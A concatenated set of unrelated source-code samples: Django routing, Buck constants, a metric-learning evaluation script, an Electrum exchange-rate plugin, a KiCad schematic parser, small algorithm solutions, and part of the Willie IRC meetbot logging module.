for hour, minute, ampm in all_times[:-1]:
# for every time in all times, except the last
hour = hour[0].replace('0', '12') if len(hour) == 1 else hour
print('{}:{} {}'.format(hour, minute, ampm) if hour else '')
hour, minute, ampm = all_times[-1]
hour = hour[0].replace('0', '12') if len(hour) == 1 else hour
print('{}:{} {}'.format(hour, minute, ampm), end="")
break
current_times = []
if all_times:
# empty line in our print
all_times.append(['', '', ''])
for _ in range(int(i)):
# for our current input range add times to times list
time = input()
time = time[:2].replace('12', '0') + time[2:] # try to replace the 12 with 0
time = time.split()
current_times += [time[0].split(':') + [time[1]]] # append the current time to current_times
current_times.sort(key=lambda x: (x[2], int(x[0]), int(x[1]))) # sort all_times by am/pm, hours, minutes
all_times += current_times |
the-stack_106_23245 | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('add/', views.add, name='add'),
path('update/', views.update, name='update'),
path('delete/', views.delete, name='delete'),
] |
the-stack_106_23246 | # Only used for PyTorch open source BUCK build
CXX = "Default"
ANDROID = "Android"
APPLE = "Apple"
FBCODE = "Fbcode"
WINDOWS = "Windows"
UNIFIED = "Unified"
# Apple SDK Definitions
IOS = "ios"
WATCHOS = "watchos"
MACOSX = "macosx"
APPLETVOS = "appletvos"
xplat_platforms = struct(
ANDROID = ANDROID,
APPLE = APPLE,
CXX = CXX,
FBCODE = FBCODE,
WINDOWS = WINDOWS,
UNIFIED = UNIFIED,
)
apple_sdks = struct(
IOS = IOS,
WATCHOS = WATCHOS,
MACOSX = MACOSX,
APPLETVOS = APPLETVOS,
)
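# Illustrative use from another build file (the load path is hypothetical):
#   load("//tools:buck_constants.bzl", "apple_sdks", "xplat_platforms")
#   xplat_platforms.ANDROID  # "Android"
#   apple_sdks.IOS           # "ios"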
|
the-stack_106_23248 | import sys
sys.path.append('../../configs')
sys.path.append('../../utils')
sys.path.append('../../tfops')
# ../../configs
from info import ACTIVATE_K_SET_IMGNET
# ../../utils
from datasetmanager import DATASETMANAGER_DICT
from format_op import params2id, listformat
from shutil_op import remove_file, remove_dir, copy_file, copy_dir
from writer import create_muldir, write_pkl
from csv_op import CsvWriter2
from reader import read_pkl
# ./
from local_config import K_SET, RESULT_DIR,\
DATASET, GPU_ID, BATCH_SIZE, EPOCH, NSCLASS,\
CONV_NAME, EMBED_M,\
LOSS_TYPE, MARGIN_ALPHA, LAMBDA,\
DECAY_TYPE, DECAY_PARAM_TYPE
from deepmetric import DeepMetric
import numpy as np
import itertools
import shutil
import glob
import os
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--gpu", default = GPU_ID, help="Utilize which gpu", type = int)
parser.add_argument("--dataset", default = DATASET, help="dataset to be used", type = str)
parser.add_argument("--nbatch", default = BATCH_SIZE, help="batch size", type = int)
parser.add_argument("--nsclass", default = NSCLASS, help="number of selected class in a batch", type = int)
parser.add_argument("--epoch", default = EPOCH, help="epoch to be ran", type = int)
parser.add_argument("--conv", default = CONV_NAME, help="conv network", type = str)
parser.add_argument("--ltype", default = LOSS_TYPE, help="loss type", type = str)
parser.add_argument("--m", default = EMBED_M, help="embedding m", type = int)
parser.add_argument("--lamb", default = LAMBDA, help="lambda", type = float)
parser.add_argument("--ma", default = MARGIN_ALPHA, help="margin alpha", type = float)
parser.add_argument("--dtype", default = DECAY_TYPE, help="decay type", type = str)
parser.add_argument("--dptype", default = DECAY_PARAM_TYPE, help="decay parameter type", type = str)
args = parser.parse_args()
nk = len(K_SET)
if __name__ == '__main__':
FILE_ID = params2id(args.dataset, args.conv, args.ltype, args.m)
QUERY_FILE_ID = params2id(args.dataset, '*', '*', args.conv, args.ltype, '*', args.m, '*', '*')
print("file id : {}".format(FILE_ID))
print("query file id : {}".format(QUERY_FILE_ID))
CSV_DIR = RESULT_DIR+'metric/csv/'
PKL_DIR = RESULT_DIR+'metric/pkl/'
LOG_DIR = RESULT_DIR+'metric/log/'
SAVE_DIR = RESULT_DIR+'metric/save/%s/'%FILE_ID
create_muldir(PKL_DIR, CSV_DIR, LOG_DIR)
copy_dst_csv = CSV_DIR+FILE_ID+'.csv'
copy_dst_pkl = PKL_DIR+FILE_ID+'.pkl'
if os.path.exists(SAVE_DIR): remove_dir(SAVE_DIR)
if os.path.exists(copy_dst_csv): remove_file(copy_dst_csv)
if os.path.exists(copy_dst_pkl): remove_file(copy_dst_pkl)
pkl_files = glob.glob(PKL_DIR+QUERY_FILE_ID+'.pkl')
print(pkl_files)
if len(pkl_files)==0:
print("No such pkl files")
sys.exit()
    best_file_id = os.path.basename(pkl_files[0])[:-4]  # strip '.pkl'
best_performance = np.sum(read_pkl(pkl_files[0])['te_te_precision_at_k'])
for pkl_idx in range(len(pkl_files)):
        file_id = os.path.basename(pkl_files[pkl_idx])[:-4]  # strip '.pkl'
performance = np.sum(read_pkl(pkl_files[pkl_idx])['te_te_precision_at_k'])
print("performance : {} from {}".format(performance, file_id))
if performance > best_performance:
best_performance = performance
best_file_id = file_id
print("best performance : {} from {}".format(best_performance, best_file_id))
copy_file(CSV_DIR+best_file_id+'.csv', copy_dst_csv)
copy_file(PKL_DIR+best_file_id+'.pkl', copy_dst_pkl)
copy_dir(RESULT_DIR+'metric/save/'+best_file_id, SAVE_DIR)
# load data
datasetmanager = DATASETMANAGER_DICT[args.dataset]
dm_train, dm_val, dm_test = datasetmanager(args.ltype, nsclass=args.nsclass)
for v in [dm_train, dm_val, dm_test]: v.print_shape()
model = DeepMetric(dm_train, dm_val, dm_test, LOG_DIR+FILE_ID+'.log', args)
model.build()
model.set_up_train()
model.restore(save_dir=SAVE_DIR)
model.prepare_test()
for activate_k in ACTIVATE_K_SET_IMGNET:
performance_th = model.test_th(activate_k, K_SET)
performance_vq = model.test_vq(activate_k, K_SET)
write_pkl({'th' : performance_th, 'vq' : performance_vq}, path=PKL_DIR + FILE_ID+'_{}.pkl'.format(activate_k))
cwrite = CsvWriter2(2)
key_set = [
'test_nmi',
'te_te_suf',
'te_te_precision_at_k',
'te_te_recall_at_k'
]
for key in key_set:
cwrite.add_header(0, str(key)+"_th")
cwrite.add_header(1, str(key)+"_vq")
content = ''
if 'suf' in str(key): content = listformat(performance_th[key])
elif 'at_k' in str(key): content = listformat(performance_th[key])
else: content = performance_th[key]
cwrite.add_content(0, content)
content = ''
if 'suf' in str(key): content = listformat(performance_vq[key])
elif 'at_k' in str(key): content = listformat(performance_vq[key])
else: content = performance_vq[key]
cwrite.add_content(1, content)
cwrite.write(CSV_DIR+FILE_ID+'_{}.csv'.format(activate_k))
model.delete()
|
the-stack_106_23249 | import time
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from electrum_twist_gui.qt.util import *
from electrum_twist_gui.qt.amountedit import AmountEdit
from electrum_twist.twist import COIN
from electrum_twist.i18n import _
from decimal import Decimal
from functools import partial
from electrum_twist.plugins import hook
from exchange_rate import FxPlugin
from electrum_twist.util import timestamp_to_datetime
class Plugin(FxPlugin, QObject):
def __init__(self, parent, config, name):
FxPlugin.__init__(self, parent, config, name)
QObject.__init__(self)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(BLACK_FG)
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.exchange_rate()
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(BLUE_FG)
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(BLUE_FG)
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
@hook
def init_qt(self, gui):
for window in gui.windows:
self.on_new_window(window)
@hook
def do_clear(self, window):
window.fiat_send_e.setText('')
def on_close(self):
self.emit(SIGNAL('close_fx_plugin'))
def restore_window(self, window):
window.update_status()
window.history_list.refresh_headers()
window.fiat_send_e.hide()
window.fiat_receive_e.hide()
def on_quotes(self):
self.emit(SIGNAL('new_fx_quotes'))
def on_history(self):
self.emit(SIGNAL('new_fx_history'))
def on_fx_history(self, window):
'''Called when historical fx quotes are updated'''
window.history_list.update()
def on_fx_quotes(self, window):
'''Called when fresh spot fx quotes come in'''
window.update_status()
self.populate_ccy_combo()
# Refresh edits with the new rate
edit = window.fiat_send_e if window.fiat_send_e.is_last_edited else window.amount_e
edit.textEdited.emit(edit.text())
edit = window.fiat_receive_e if window.fiat_receive_e.is_last_edited else window.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.history_used_spot:
self.on_fx_history(window)
def on_ccy_combo_change(self):
'''Called when the chosen currency changes'''
ccy = str(self.ccy_combo.currentText())
if ccy and ccy != self.ccy:
self.set_currency(ccy)
self.hist_checkbox_update()
def hist_checkbox_update(self):
if self.hist_checkbox:
self.hist_checkbox.setEnabled(self.ccy in self.exchange.history_ccys())
self.hist_checkbox.setChecked(self.config_history())
def populate_ccy_combo(self):
# There should be at most one instance of the settings dialog
combo = self.ccy_combo
# NOTE: bool(combo) is False if it is empty. Nuts.
if combo is not None:
combo.blockSignals(True)
combo.clear()
combo.addItems(sorted(self.exchange.quotes.keys()))
combo.blockSignals(False)
combo.setCurrentIndex(combo.findText(self.ccy))
@hook
def on_new_window(self, window):
# Additional send and receive edit boxes
if not hasattr(window, 'fiat_send_e'):
send_e = AmountEdit(self.get_currency)
window.send_grid.addWidget(send_e, 4, 2, Qt.AlignLeft)
window.amount_e.frozen.connect(
lambda: send_e.setFrozen(window.amount_e.isReadOnly()))
receive_e = AmountEdit(self.get_currency)
window.receive_grid.addWidget(receive_e, 2, 2, Qt.AlignLeft)
window.fiat_send_e = send_e
window.fiat_receive_e = receive_e
self.connect_fields(window, window.amount_e, send_e, window.fee_e)
self.connect_fields(window, window.receive_amount_e, receive_e, None)
else:
window.fiat_send_e.show()
window.fiat_receive_e.show()
window.history_list.refresh_headers()
window.update_status()
window.connect(self, SIGNAL('new_fx_quotes'), lambda: self.on_fx_quotes(window))
window.connect(self, SIGNAL('new_fx_history'), lambda: self.on_fx_history(window))
window.connect(self, SIGNAL('close_fx_plugin'), lambda: self.restore_window(window))
window.connect(self, SIGNAL('refresh_headers'), window.history_list.refresh_headers)
def settings_widget(self, window):
return EnterButton(_('Settings'), partial(self.settings_dialog, window))
def settings_dialog(self, window):
d = WindowModalDialog(window, _("Exchange Rate Settings"))
layout = QGridLayout(d)
layout.addWidget(QLabel(_('Exchange rate API: ')), 0, 0)
layout.addWidget(QLabel(_('Currency: ')), 1, 0)
layout.addWidget(QLabel(_('History Rates: ')), 2, 0)
# Currency list
self.ccy_combo = QComboBox()
self.ccy_combo.currentIndexChanged.connect(self.on_ccy_combo_change)
self.populate_ccy_combo()
def on_change_ex(idx):
exchange = str(combo_ex.currentText())
if exchange != self.exchange.name():
self.set_exchange(exchange)
self.hist_checkbox_update()
def on_change_hist(checked):
if checked:
self.config.set_key('history_rates', 'checked')
self.get_historical_rates()
else:
self.config.set_key('history_rates', 'unchecked')
self.emit(SIGNAL('refresh_headers'))
def ok_clicked():
self.timeout = 0
self.ccy_combo = None
d.accept()
combo_ex = QComboBox()
combo_ex.addItems(sorted(self.exchanges.keys()))
combo_ex.setCurrentIndex(combo_ex.findText(self.config_exchange()))
combo_ex.currentIndexChanged.connect(on_change_ex)
self.hist_checkbox = QCheckBox()
self.hist_checkbox.stateChanged.connect(on_change_hist)
self.hist_checkbox_update()
ok_button = QPushButton(_("OK"))
ok_button.clicked.connect(lambda: ok_clicked())
layout.addWidget(self.ccy_combo,1,1)
layout.addWidget(combo_ex,0,1)
layout.addWidget(self.hist_checkbox,2,1)
layout.addWidget(ok_button,3,1)
return d.exec_()
def config_history(self):
return self.config.get('history_rates', 'unchecked') != 'unchecked'
def show_history(self):
return self.config_history() and self.ccy in self.exchange.history_ccys()
@hook
def history_tab_headers(self, headers):
if self.show_history():
headers.extend(['%s '%self.ccy + _('Amount'), '%s '%self.ccy + _('Balance')])
@hook
def history_tab_update_begin(self):
self.history_used_spot = False
@hook
def history_tab_update(self, tx, entry):
if not self.show_history():
return
tx_hash, height, conf, timestamp, value, balance = tx
if conf <= 0:
date = timestamp_to_datetime(time.time())
else:
date = timestamp_to_datetime(timestamp)
for amount in [value, balance]:
text = self.historical_value_str(amount, date)
entry.append(text)
|
the-stack_106_23250 | from dataclasses import dataclass, field
from kikit.sexpr import Atom, parseSexprF
from itertools import islice
import os
from typing import Optional
@dataclass
class Symbol:
uuid: Optional[str] = None
path: Optional[str] = None
unit: Optional[int] = None
lib_id: Optional[str] = None
in_bom: Optional[bool] = None
on_board: Optional[bool] = None
properties: dict = field(default_factory=dict)
@dataclass
class SymbolInstance:
path: Optional[str] = None
reference: Optional[str] = None
unit: Optional[int] = None
value: Optional[str] = None
footprint: Optional[str] = None
def getProperty(sexpr, field):
for x in islice(sexpr, 1, None):
if len(x) > 0 and \
isinstance(x[0], Atom) and x[0].value == "property" and \
isinstance(x[1], Atom) and x[1].value == field:
return x[2].value
return None
def isSymbol(sexpr):
if isinstance(sexpr, Atom) or len(sexpr) == 0:
return False
item = sexpr[0]
return isinstance(item, Atom) and item.value == "symbol"
def isSymbolInstances(sexpr):
if isinstance(sexpr, Atom) or len(sexpr) == 0:
return False
item = sexpr[0]
return isinstance(item, Atom) and item.value == "symbol_instances"
def isSheet(sexpr):
if isinstance(sexpr, Atom) or len(sexpr) == 0:
return False
item = sexpr[0]
return isinstance(item, Atom) and item.value == "sheet"
def isPath(sexpr):
if isinstance(sexpr, Atom) or len(sexpr) == 0:
return False
item = sexpr[0]
return isinstance(item, Atom) and item.value == "path"
def getUuid(sexpr):
for x in islice(sexpr, 1, None):
if x and x[0] == "uuid":
return x[1].value
return None
def extractSymbol(sexpr, path):
s = Symbol()
for x in islice(sexpr, 1, None):
if not x:
continue
key = x[0]
if not isinstance(key, Atom):
continue
key = key.value
if key == "lib_id":
s.lib_id = x[1].value
elif key == "lib_id":
s.unit = int(x[1].value)
elif key == "uuid":
s.uuid = x[1].value
s.path = path + "/" + s.uuid
elif key == "in_bom":
s.in_bom = x[1].value == "yes"
elif key == "on_board":
s.on_board = x[1].value == "yes"
elif key == "property":
s.properties[x[1].value] = x[2].value
return s
def extractSymbolInstance(sexpr):
s = SymbolInstance()
s.path = sexpr[1].value
for x in islice(sexpr, 2, None):
if not len(x) > 1:
continue
key = x[0]
if not isinstance(key, Atom):
continue
key = key.value
if key == "reference":
s.reference = x[1].value
elif key == "unit":
s.unit = int(x[1].value)
elif key == "value":
s.value = x[1].value
elif key == "footprint":
s.footprint = x[1].value
return s
def collectSymbols(filename, path=""):
"""
Crawl given sheet and return two lists - one with symbols, one with
symbol instances
"""
with open(filename) as f:
sheetSExpr = parseSexprF(f)
symbols, instances = [], []
for item in sheetSExpr.items:
if isSymbol(item):
symbols.append(extractSymbol(item, path))
continue
if isSheet(item):
f = getProperty(item, "Sheet file")
uuid = getUuid(item)
dirname = os.path.dirname(filename)
if len(dirname) > 0:
f = dirname + "/" + f
s, i = collectSymbols(f, path + "/" + uuid)
symbols += s
instances += i
continue
if isSymbolInstances(item):
for p in item.items:
if isPath(p):
instances.append(extractSymbolInstance(p))
continue
return symbols, instances
def getField(component, field):
return component.properties.get(field, None)
def getUnit(component):
return component.unit
def getReference(component):
return component.properties["Reference"]
def extractComponents(filename):
symbols, instances = collectSymbols(filename)
symbolsDict = {x.path: x for x in symbols}
assert len(symbols) == len(instances)
components = []
for inst in instances:
s = symbolsDict[inst.path]
# Note that s should be unique, so we can safely modify it
s.properties["Reference"] = inst.reference
s.properties["Value"] = inst.value
s.properties["Footprint"] = inst.footprint
s.unit = inst.unit
components.append(s)
return components
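# Illustrative use (the schematic file name is hypothetical):
# if __name__ == "__main__":
#     for c in extractComponents("project.kicad_sch"):
#         print(getReference(c), getField(c, "Value"), getUnit(c))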
|
the-stack_106_23253 | """
Given an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.
You may assume that each input would have exactly one solution, and you may not use the same element twice.
You can return the answer in any order.
Example 1:
Input: nums = [2,7,11,15], target = 9
Output: [0,1]
Explanation: Because nums[0] + nums[1] == 9, we return [0, 1].
Example 2:
Input: nums = [3,2,4], target = 6
Output: [1,2]
Example 3:
Input: nums = [3,3], target = 6
Output: [0,1]
Constraints:
2 <= nums.length <= 10^3
-10^9 <= nums[i] <= 10^9
-10^9 <= target <= 10^9
Only one valid answer exists.
"""
from typing import List
class Solution1:
def twoSum(self, nums: List[int], target: int) -> List[int]:
hash_map = {}
for i, n in enumerate(nums):
if target - n in hash_map:
return [hash_map[target - n], i]
hash_map[n] = i
raise ValueError
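# Minimal self-check of the hash-map approach; the expected outputs come from the
# examples in the problem statement above.
if __name__ == "__main__":
    assert Solution1().twoSum([2, 7, 11, 15], 9) == [0, 1]
    assert Solution1().twoSum([3, 2, 4], 6) == [1, 2]
    assert Solution1().twoSum([3, 3], 6) == [0, 1]
    print("all examples passed")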
|
the-stack_106_23254 | """
Creating prime sieve (optimized version).
.. module:: sieve_of_eratosthenes_optimized
:platform: Unix, Windows
:synopis: creating prime sieve
.. moduleauthor:: Thomas Lehmann <[email protected]>
=======
License
=======
Copyright (c) 2015 Thomas Lehmann
Permission is hereby granted, free of charge, to any person obtaining a copy of this
software and associated documentation files (the "Software"), to deal in the Software
without restriction, including without limitation the rights to use, copy, modify, merge,
publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies
or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import math
class sieve_of_eratosthenes_optimized(object):
"""Prime sieve."""
def __init__(self, max_n):
"""Initialize sieve."""
self.max_n = max_n
self.sieve = [True] * (self.max_n // 2 + 1)
self.sieve[0] = False
self.sieve[1] = True
def calculate(self):
"""Strike out all multiples of a prime as none prime."""
limit = int(math.sqrt(self.max_n))
value_i = 3
while value_i <= limit:
if self.sieve[value_i // 2]:
value_j = value_i ** 2
offset = 2 * value_i
while value_j <= self.max_n:
self.sieve[value_j // 2] = False
value_j += offset
value_i += 2
def get_primes(self):
"""
Get all primes.
:returns: list of primes
"""
return [2] + [n for n in range(3, self.max_n + 1, 2) if self.sieve[n // 2]]
def is_prime(self, value):
"""
Checking sieve for value.
        It's expected that the given value is odd, since
        the sieve ignores even values.
        :param value: value to be checked for primality.
:returns: True when given number is a prime.
"""
return self.sieve[value // 2]
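# Hypothetical usage sketch (not part of the original module): the bound of 50 is an
# illustrative value.
if __name__ == "__main__":
    sieve = sieve_of_eratosthenes_optimized(50)
    sieve.calculate()
    print(sieve.get_primes())  # [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47]
    print(sieve.is_prime(37))  # True (the argument must be odd)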
|
the-stack_106_23255 | # coding=utf8
"""
meetbot.py - Willie meeting logger module
Copyright © 2012, Elad Alfassa, <[email protected]>
Licensed under the Eiffel Forum License 2.
This module is an attempt to implement at least some of the functionality of Debian's meetbot
"""
from __future__ import unicode_literals
import time
import os
from willie.web import quote
from willie.modules.url import find_title
from willie.module import example, commands, rule, priority
from willie.tools import Ddict, Identifier
import codecs
def configure(config):
"""
| [meetbot] | example | purpose |
| --------- | ------- | ------- |
| meeting_log_path | /home/willie/www/meetings | Path to meeting logs storage directory (should be an absolute path, accessible on a webserver) |
| meeting_log_baseurl | http://example.com/~willie/meetings | Base URL for the meeting logs directory |
"""
if config.option('Configure meetbot', False):
config.interactive_add('meetbot', 'meeting_log_path', "Path to meeting logs storage directory (should be an absolute path, accessible on a webserver)")
config.interactive_add('meetbot', 'meeting_log_baseurl', "Base URL for the meeting logs directory (eg. http://example.com/logs)")
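# Hypothetical example of the resulting config section (values are the illustrative
# ones from the table in the docstring above):
#
# [meetbot]
# meeting_log_path = /home/willie/www/meetings
# meeting_log_baseurl = http://example.com/~willie/meetings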
meetings_dict = Ddict(dict) # Saves metadata about currently running meetings
"""
meetings_dict is a 2D dict.
Each meeting should have:
channel
time of start
head (can stop the meeting, plus all abilities of chairs)
chairs (can add infolines to the logs)
title
current subject
comments (what people who aren't voiced want to add)
Using channel as the meeting ID as there can't be more than one meeting in a channel at the same time.
"""
meeting_log_path = '' # To be defined on meeting start as part of sanity checks, used by logging functions so we don't have to pass them bot
meeting_log_baseurl = '' # To be defined on meeting start as part of sanity checks, used by logging functions so we don't have to pass them bot
meeting_actions = {} # A dict of channels to the actions that have been created in them. This way we can have .listactions spit them back out later on.
#Get the logfile name for the meeting in the requested channel
#Used by all logging functions
def figure_logfile_name(channel):
    if meetings_dict[channel]['title'] == 'Untitled meeting':
name = 'untitled'
else:
name = meetings_dict[channel]['title']
# Real simple sluggifying. This bunch of characters isn't exhaustive, but
# whatever. It's close enough for most situations, I think.
for c in ' ./\\:*?"<>|&*`':
name = name.replace(c, '-')
timestring = time.strftime('%Y-%m-%d-%H:%M', time.gmtime(meetings_dict[channel]['start']))
filename = timestring + '_' + name
return filename
#Start HTML log
def logHTML_start(channel):
logfile = codecs.open(meeting_log_path + channel + '/' + figure_logfile_name(channel) + '.html', 'a', encoding='utf-8')
timestring = time.strftime('%Y-%m-%d %H:%M', time.gmtime(meetings_dict[channel]['start']))
title = '%s at %s, %s' % (meetings_dict[channel]['title'], channel, timestring)
logfile.write('<!doctype html>\n<html>\n<head>\n<meta charset="utf-8">\n<title>%TITLE%</title>\n</head>\n<body>\n<h1>%TITLE%</h1>\n'.replace('%TITLE%', title))
logfile.write('<h4>Meeting started by %s</h4><ul>\n' % meetings_dict[channel]['head'])
logfile.close()
#Write a list item in the HTML log
def logHTML_listitem(item, channel):
logfile = codecs.open(meeting_log_path + channel + '/' + figure_logfile_name(channel) + '.html', 'a', encoding='utf-8')
logfile.write('<li>' + item + '</li>\n')
logfile.close()
#End the HTML log
def logHTML_end(channel):
logfile = codecs.open(meeting_log_path + channel + '/' + figure_logfile_name(channel) + '.html', 'a', encoding='utf-8')
current_time = time.strftime('%H:%M:%S', time.gmtime())
logfile.write('</ul>\n<h4>Meeting ended at %s UTC</h4>\n' % current_time)
plainlog_url = meeting_log_baseurl + quote(channel + '/' + figure_logfile_name(channel) + '.log')
logfile.write('<a href="%s">Full log</a>' % plainlog_url)
logfile.write('\n</body>\n</html>')
logfile.close()
#Write a string to the plain text log
def logplain(item, channel):
current_time = time.strftime('%H:%M:%S', time.gmtime())
logfile = codecs.open(meeting_log_path + channel + '/' + figure_logfile_name(channel) + '.log', 'a', encoding='utf-8')
logfile.write('[' + current_time + '] ' + item + '\r\n')
logfile.close()
#Check if a meeting is currently running
def ismeetingrunning(channel):
try:
if meetings_dict[channel]['running']:
return True
else:
return False
except:
return False
#Check if nick is a chair or head of the meeting
def ischair(nick, channel):
try:
if nick.lower() == meetings_dict[channel]['head'] or nick.lower() in meetings_dict[channel]['chairs']:
return True
else:
return False
except:
return False
#Start meeting (also preforms all required sanity checks)
@commands('startmeeting')
@example('.startmeeting title or .startmeeting')
def startmeeting(bot, trigger):
"""
Start a meeting.
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, there is already a meeting in progress here!')
return
if trigger.is_privmsg:
bot.say('Can only start meetings in channels')
return
if not bot.config.has_section('meetbot'):
bot.say('Meetbot not configured, make sure meeting_log_path and meeting_log_baseurl are defined')
return
#Start the meeting
meetings_dict[trigger.sender]['start'] = time.time()
if not trigger.group(2):
meetings_dict[trigger.sender]['title'] = 'Untitled meeting'
else:
meetings_dict[trigger.sender]['title'] = trigger.group(2)
meetings_dict[trigger.sender]['head'] = trigger.nick.lower()
meetings_dict[trigger.sender]['running'] = True
meetings_dict[trigger.sender]['comments'] = []
global meeting_log_path
meeting_log_path = bot.config.meetbot.meeting_log_path
if not meeting_log_path.endswith('/'):
meeting_log_path = meeting_log_path + '/'
global meeting_log_baseurl
meeting_log_baseurl = bot.config.meetbot.meeting_log_baseurl
if not meeting_log_baseurl.endswith('/'):
meeting_log_baseurl = meeting_log_baseurl + '/'
if not os.path.isdir(meeting_log_path + trigger.sender):
try:
os.makedirs(meeting_log_path + trigger.sender)
except Exception as e:
bot.say("Can't create log directory for this channel, meeting not started!")
meetings_dict[trigger.sender] = Ddict(dict)
raise
return
#Okay, meeting started!
logplain('Meeting started by ' + trigger.nick.lower(), trigger.sender)
logHTML_start(trigger.sender)
meeting_actions[trigger.sender] = []
bot.say('Meeting started! use .action, .agreed, .info, .chairs, .subject and .comments to control the meeting. to end the meeting, type .endmeeting')
bot.say('Users without speaking permission can use .comment ' +
trigger.sender + ' followed by their comment in a PM with me to '
'vocalize themselves.')
#Change the current subject (will appear as <h3> in the HTML log)
@commands('subject')
@example('.subject roll call')
def meetingsubject(bot, trigger):
"""
Change the meeting subject.
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
if not trigger.group(2):
bot.say('what is the subject?')
return
if not ischair(trigger.nick, trigger.sender):
bot.say('Only meeting head or chairs can do that')
return
meetings_dict[trigger.sender]['current_subject'] = trigger.group(2)
logfile = codecs.open(meeting_log_path + trigger.sender + '/' + figure_logfile_name(trigger.sender) + '.html', 'a', encoding='utf-8')
logfile.write('</ul><h3>' + trigger.group(2) + '</h3><ul>')
logfile.close()
logplain('Current subject: ' + trigger.group(2) + ', (set by ' + trigger.nick + ')', trigger.sender)
bot.say('Current subject: ' + trigger.group(2))
#End the meeting
@commands('endmeeting')
@example('.endmeeting')
def endmeeting(bot, trigger):
"""
End a meeting.
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
if not ischair(trigger.nick, trigger.sender):
bot.say('Only meeting head or chairs can do that')
return
meeting_length = time.time() - meetings_dict[trigger.sender]['start']
#TODO: Humanize time output
bot.say("Meeting ended! total meeting length %d seconds" % meeting_length)
logHTML_end(trigger.sender)
htmllog_url = meeting_log_baseurl + quote(trigger.sender + '/' + figure_logfile_name(trigger.sender) + '.html')
logplain('Meeting ended by %s, total meeting length %d seconds' % (trigger.nick, meeting_length), trigger.sender)
bot.say('Meeting minutes: ' + htmllog_url)
meetings_dict[trigger.sender] = Ddict(dict)
del meeting_actions[trigger.sender]
#Set meeting chairs (people who can control the meeting)
@commands('chairs')
@example('.chairs Tyrope Jason elad')
def chairs(bot, trigger):
"""
Set the meeting chairs.
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
if not trigger.group(2):
bot.say('Who are the chairs?')
return
if trigger.nick.lower() == meetings_dict[trigger.sender]['head']:
meetings_dict[trigger.sender]['chairs'] = trigger.group(2).lower().split(' ')
chairs_readable = trigger.group(2).lower().replace(' ', ', ')
logplain('Meeting chairs are: ' + chairs_readable, trigger.sender)
logHTML_listitem('<span style="font-weight: bold">Meeting chairs are: </span>' + chairs_readable, trigger.sender)
bot.say('Meeting chairs are: ' + chairs_readable)
else:
bot.say("Only meeting head can set chairs")
#Log action item in the HTML log
@commands('action')
@example('.action elad will develop a meetbot')
def meetingaction(bot, trigger):
"""
Log an action in the meeting log
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
if not trigger.group(2):
bot.say('try .action someone will do something')
return
if not ischair(trigger.nick, trigger.sender):
bot.say('Only meeting head or chairs can do that')
return
logplain('ACTION: ' + trigger.group(2), trigger.sender)
logHTML_listitem('<span style="font-weight: bold">Action: </span>' + trigger.group(2), trigger.sender)
meeting_actions[trigger.sender].append(trigger.group(2))
bot.say('ACTION: ' + trigger.group(2))
@commands('listactions')
@example('.listactions')
def listactions(bot, trigger):
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
for action in meeting_actions[trigger.sender]:
bot.say('ACTION: ' + action)
#Log agreed item in the HTML log
@commands('agreed')
@example('.agreed Bowties are cool')
def meetingagreed(bot, trigger):
"""
Log an agreement in the meeting log.
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
if not trigger.group(2):
        bot.say('try .agreed we agreed on something')
return
if not ischair(trigger.nick, trigger.sender):
bot.say('Only meeting head or chairs can do that')
return
logplain('AGREED: ' + trigger.group(2), trigger.sender)
logHTML_listitem('<span style="font-weight: bold">Agreed: </span>' + trigger.group(2), trigger.sender)
bot.say('AGREED: ' + trigger.group(2))
#Log link item in the HTML log
@commands('link')
@example('.link http://example.com')
def meetinglink(bot, trigger):
"""
    Log a link in the meeting log.
https://github.com/embolalia/willie/wiki/Using-the-meetbot-module
"""
if not ismeetingrunning(trigger.sender):
bot.say('Can\'t do that, start meeting first')
return
